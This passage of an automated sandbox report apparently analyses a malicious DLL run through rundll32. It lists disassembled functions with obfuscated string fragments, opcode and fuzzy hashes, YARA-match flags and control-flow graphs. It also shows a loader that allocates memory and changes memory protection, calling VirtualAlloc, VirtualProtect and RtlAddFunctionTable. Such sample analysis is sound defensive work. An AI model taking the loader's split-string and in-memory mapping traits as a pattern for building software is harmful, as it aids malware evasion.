                                                                    Function 0000000180016D3C Relevance: 6.6, Strings: 5, Instructions: 379COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: JQ$k&($t$v$x\J
                                                                    • API String ID: 0-1134872184
                                                                    • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                    • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                    • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                    • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000703C Relevance: 6.3, Strings: 5, Instructions: 87COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: R$)H8$?rIc$L==$V
                                                                    • API String ID: 0-2512384441
                                                                    • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                    • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                    • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                    • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800119A8 Relevance: 6.3, Strings: 5, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Qq$bt$vird$+$S
                                                                    • API String ID: 0-3373980505
                                                                    • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                    • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                    • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                    • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180011AD0 Relevance: 5.3, Strings: 4, Instructions: 335COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: V$@$P9$^_"
                                                                    • API String ID: 0-1880944046
                                                                    • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                    • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                    • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                    • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800132F0 Relevance: 5.3, Strings: 4, Instructions: 312COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: =_$F)k$b/$syG
                                                                    • API String ID: 0-3955183656
                                                                    • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                    • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                    • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                    • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180002D70 Relevance: 5.3, Strings: 4, Instructions: 266COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$'Xsa$iJ6$vG
                                                                    • API String ID: 0-746338152
                                                                    • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                    • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                    • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                    • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800097C0 Relevance: 5.3, Strings: 4, Instructions: 257COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *i^$MIC$-Z$]2
                                                                    • API String ID: 0-498664264
                                                                    • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                    • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                    • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                    • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180010758 Relevance: 5.2, Strings: 4, Instructions: 222COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: B$EG$QsF$_
                                                                    • API String ID: 0-784369960
                                                                    • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                    • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                    • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                    • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180020334 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -`G$.$5B.Y$Z`35
                                                                    • API String ID: 0-1363032466
                                                                    • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                    • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                    • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                    • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000EE98 Relevance: 5.2, Strings: 4, Instructions: 167COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *+_$WSh$\O$#o
                                                                    • API String ID: 0-1846314129
                                                                    • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                    • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                    • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                    • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180024D80 Relevance: 5.2, Strings: 4, Instructions: 155COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .B$O$M*K$\<
                                                                    • API String ID: 0-3225238681
                                                                    • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                    • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                    • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                    • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018002A42C Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$$$xVO$~O
                                                                    • API String ID: 0-3655128719
                                                                    • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                    • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                    • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                    • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800024B8 Relevance: 5.1, Strings: 4, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,IW$G$JMg$l
                                                                    • API String ID: 0-1370644289
                                                                    • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                    • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                    • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                    • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180018AB4 Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.355889748.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,$,$2S=$i`}G
                                                                    • API String ID: 0-4285990414
                                                                    • Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                    • Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
                                                                    • Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                    • Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:10.7%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:11
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 3264 1a5a5e90000 3265 1a5a5e90183 3264->3265 3266 1a5a5e9043e VirtualAlloc 3265->3266 3270 1a5a5e90462 3266->3270 3267 1a5a5e90a7b 3268 1a5a5e90531 GetNativeSystemInfo 3268->3267 3269 1a5a5e9056d VirtualAlloc 3268->3269 3274 1a5a5e9058b 3269->3274 3270->3267 3270->3268 3271 1a5a5e90a00 3271->3267 3272 1a5a5e90a56 RtlAddFunctionTable 3271->3272 3272->3267 3273 1a5a5e909d9 VirtualProtect 3273->3274 3274->3271 3274->3273 3274->3274

                                                                    Executed Functions

                                                                    Function 000001A5A5E90000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 1a5a5e90000-1a5a5e90460 call 1a5a5e90aa8 * 2 VirtualAlloc 22 1a5a5e90462-1a5a5e90466 0->22 23 1a5a5e9048a-1a5a5e90494 0->23 24 1a5a5e90468-1a5a5e90488 22->24 26 1a5a5e90a91-1a5a5e90aa6 23->26 27 1a5a5e9049a-1a5a5e9049e 23->27 24->23 24->24 27->26 28 1a5a5e904a4-1a5a5e904a8 27->28 28->26 29 1a5a5e904ae-1a5a5e904b2 28->29 29->26 30 1a5a5e904b8-1a5a5e904bf 29->30 30->26 31 1a5a5e904c5-1a5a5e904d2 30->31 31->26 32 1a5a5e904d8-1a5a5e904e1 31->32 32->26 33 1a5a5e904e7-1a5a5e904f4 32->33 33->26 34 1a5a5e904fa-1a5a5e90507 33->34 35 1a5a5e90531-1a5a5e90567 GetNativeSystemInfo 34->35 36 1a5a5e90509-1a5a5e90511 34->36 35->26 38 1a5a5e9056d-1a5a5e90589 VirtualAlloc 35->38 37 1a5a5e90513-1a5a5e90518 36->37 39 1a5a5e90521 37->39 40 1a5a5e9051a-1a5a5e9051f 37->40 41 1a5a5e905a0-1a5a5e905ac 38->41 42 1a5a5e9058b-1a5a5e9059e 38->42 44 1a5a5e90523-1a5a5e9052f 39->44 40->44 43 1a5a5e905af-1a5a5e905b2 41->43 42->41 45 1a5a5e905c1-1a5a5e905db 43->45 46 1a5a5e905b4-1a5a5e905bf 43->46 44->35 44->37 48 1a5a5e905dd-1a5a5e905e2 45->48 49 1a5a5e9061b-1a5a5e90622 45->49 46->43 50 1a5a5e905e4-1a5a5e905ea 48->50 51 1a5a5e90628-1a5a5e9062f 49->51 52 1a5a5e906db-1a5a5e906e2 49->52 53 1a5a5e905ec-1a5a5e90609 50->53 54 1a5a5e9060b-1a5a5e90619 50->54 51->52 55 1a5a5e90635-1a5a5e90642 51->55 56 1a5a5e90864-1a5a5e9086b 52->56 57 1a5a5e906e8-1a5a5e906f9 52->57 53->53 53->54 54->49 54->50 55->52 60 1a5a5e90648-1a5a5e9064f 55->60 58 1a5a5e90871-1a5a5e9087f 56->58 59 1a5a5e90917-1a5a5e90929 56->59 61 1a5a5e90702-1a5a5e90705 57->61 64 1a5a5e9090e-1a5a5e90911 58->64 62 1a5a5e9092f-1a5a5e90937 59->62 63 1a5a5e90a07-1a5a5e90a1a 59->63 65 1a5a5e90654-1a5a5e90658 60->65 66 1a5a5e90707-1a5a5e9070a 61->66 67 1a5a5e906fb-1a5a5e906ff 61->67 69 1a5a5e9093b-1a5a5e9093f 62->69 81 1a5a5e90a40-1a5a5e90a4a 63->81 82 1a5a5e90a1c-1a5a5e90a27 63->82 64->59 68 1a5a5e90884-1a5a5e908a9 64->68 70 1a5a5e906c0-1a5a5e906ca 65->70 71 1a5a5e90788-1a5a5e9078e 66->71 72 1a5a5e9070c-1a5a5e9071d 66->72 67->61 101 1a5a5e90907-1a5a5e9090c 68->101 102 1a5a5e908ab-1a5a5e908b1 68->102 78 1a5a5e90945-1a5a5e9095a 69->78 79 1a5a5e909ec-1a5a5e909fa 69->79 76 1a5a5e9065a-1a5a5e90669 70->76 77 1a5a5e906cc-1a5a5e906d2 70->77 74 1a5a5e90794-1a5a5e907a2 71->74 73 1a5a5e9071f-1a5a5e90720 72->73 72->74 80 1a5a5e90722-1a5a5e90784 73->80 83 1a5a5e9085d-1a5a5e9085e 74->83 84 1a5a5e907a8 74->84 89 1a5a5e9067a-1a5a5e9067e 76->89 90 1a5a5e9066b-1a5a5e90678 76->90 77->65 85 1a5a5e906d4-1a5a5e906d5 77->85 87 1a5a5e9095c-1a5a5e9095e 78->87 88 1a5a5e9097b-1a5a5e9097d 78->88 79->69 91 1a5a5e90a00-1a5a5e90a01 79->91 80->80 96 1a5a5e90786 80->96 99 1a5a5e90a4c-1a5a5e90a54 81->99 100 1a5a5e90a7b-1a5a5e90a8e 81->100 97 1a5a5e90a38-1a5a5e90a3e 82->97 83->56 98 1a5a5e907ae-1a5a5e907d4 84->98 85->52 103 1a5a5e9096e-1a5a5e90979 87->103 104 1a5a5e90960-1a5a5e9096c 87->104 92 1a5a5e9097f-1a5a5e90981 88->92 93 1a5a5e909a2-1a5a5e909a4 88->93 94 1a5a5e90680-1a5a5e9068a 89->94 95 1a5a5e9068c-1a5a5e90690 89->95 105 1a5a5e906bd-1a5a5e906be 90->105 91->63 106 1a5a5e90983-1a5a5e90987 92->106 107 1a5a5e90989-1a5a5e9098b 92->107 111 1a5a5e909a6-1a5a5e909aa 93->111 112 1a5a5e909ac-1a5a5e909bb 93->112 108 1a5a5e906b6-1a5a5e906ba 94->108 109 1a5a5e90692-1a5a5e906a3 95->109 110 1a5a5e906a5-1a5a5e906a9 95->110 96->74 97->81 115 1a5a5e90a29-1a5a5e90a35 97->115 131 1a5a5e907d6-1a5a5e907d9 98->131 132 1a5a5e90835-1a5a5e90839 98->132 99->100 116 1a5a5e90a56-1a5a5e90a79 RtlAddFunctionTable 99->116 100->26 101->64 113 1a5a5e908b3-1a5a5e908b9 102->113 114 1a5a5e908bb-1a5a5e908c8 102->114 117 1a5a5e909be-1a5a5e909bf 103->117 104->117 105->70 106->117 107->93 118 1a5a5e9098d-1a5a5e9098f 107->118 108->105 109->108 110->105 119 1a5a5e906ab-1a5a5e906b3 110->119 111->117 112->117 121 1a5a5e908ea-1a5a5e908fe 113->121 122 1a5a5e908d3-1a5a5e908e5 114->122 123 1a5a5e908ca-1a5a5e908d1 114->123 115->97 116->100 120 1a5a5e909c5-1a5a5e909cb 117->120 126 1a5a5e90991-1a5a5e90997 118->126 127 1a5a5e90999-1a5a5e909a0 118->127 119->108 128 1a5a5e909cd-1a5a5e909d3 120->128 129 1a5a5e909d9-1a5a5e909e9 VirtualProtect 120->129 121->101 139 1a5a5e90900-1a5a5e90905 121->139 122->121 123->122 123->123 126->117 127->120 128->129 129->79 136 1a5a5e907e3-1a5a5e907f0 131->136 137 1a5a5e907db-1a5a5e907e1 131->137 133 1a5a5e90844-1a5a5e90850 132->133 134 1a5a5e9083b 132->134 133->98 138 1a5a5e90856-1a5a5e90857 133->138 134->133 141 1a5a5e907f2-1a5a5e907f9 136->141 142 1a5a5e907fb-1a5a5e9080d 136->142 140 1a5a5e90812-1a5a5e9082c 137->140 138->83 139->102 140->132 144 1a5a5e9082e-1a5a5e90833 140->144 141->141 141->142 142->140 144->131
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.356037217.000001A5A5E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001A5A5E90000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1a5a5e90000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                    • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                    • API String ID: 394283112-2517549848
                                                                    • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction ID: a8a076330666a1adf0b3f43f31cfff43b19503f18e706ae827e25901d07d5a69
                                                                    • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction Fuzzy Hash: 1672F230719A48CBDB69DF68C885BF9B7E1FB99304F50426DE88AC3251DB34D542CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018002C058 Relevance: 10.4, Strings: 8, Instructions: 370COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                    • API String ID: 0-464535774
                                                                    • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                    • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                    • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                    • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180010FF4 Relevance: 7.9, Strings: 6, Instructions: 363COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 180 180010ff4-180011016 181 180011020 180->181 182 180011022-180011028 181->182 183 180011814 182->183 184 18001102e-180011034 182->184 185 180011819-18001181f 183->185 186 1800114e2-1800114ec 184->186 187 18001103a-180011040 184->187 185->182 188 180011825-180011832 185->188 191 1800114f5-18001151d 186->191 192 1800114ee-1800114f3 186->192 189 1800113e2-1800114d2 call 180008200 187->189 190 180011046-18001104c 187->190 189->188 199 1800114d8-1800114dd 189->199 190->185 194 180011052-18001120b call 180021040 call 1800291ac 190->194 195 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 191->195 192->195 207 180011212-1800113d7 call 1800291ac call 18001e2bc 194->207 208 18001120d 194->208 209 1800117f9-180011803 195->209 199->182 207->188 215 1800113dd 207->215 208->207 209->188 212 180011805-18001180f 209->212 212->182 215->181
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                    • API String ID: 0-3528011396
                                                                    • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                    • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                    • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                    • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180021618 Relevance: 7.8, Strings: 6, Instructions: 266COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 216 180021618-180021653 217 180021655-18002165a 216->217 218 180021bf3-180021c25 217->218 219 180021660-180021665 217->219 220 180021c2a-180021c2f 218->220 221 180021a81-180021bda call 180016314 219->221 222 18002166b-180021670 219->222 224 180021838-180021845 220->224 225 180021c35 220->225 229 180021bdf-180021bee 221->229 226 1800219f3-180021a7c call 180001b1c 222->226 227 180021676-18002167b 222->227 225->217 226->217 230 1800219e4-1800219ee 227->230 231 180021681-180021686 227->231 229->217 230->217 233 1800219d5-1800219df call 18001dfb4 231->233 234 18002168c-180021691 231->234 233->217 235 180021697-18002169c 234->235 236 18002190c-1800219a5 call 18000abac 234->236 239 1800216a2-1800216a7 235->239 240 180021846-180021907 call 180021434 235->240 243 1800219aa-1800219b0 236->243 239->220 244 1800216ad-180021835 call 180008200 call 1800166c0 239->244 240->217 247 1800219b2-1800219c6 243->247 248 1800219cb-1800219d0 243->248 244->224 247->217 248->217
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.355821732.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $&.+$)O$.pN$F>9$t(/
                                                                    • API String ID: 0-3036092626
                                                                    • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                    • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                    • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                    • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

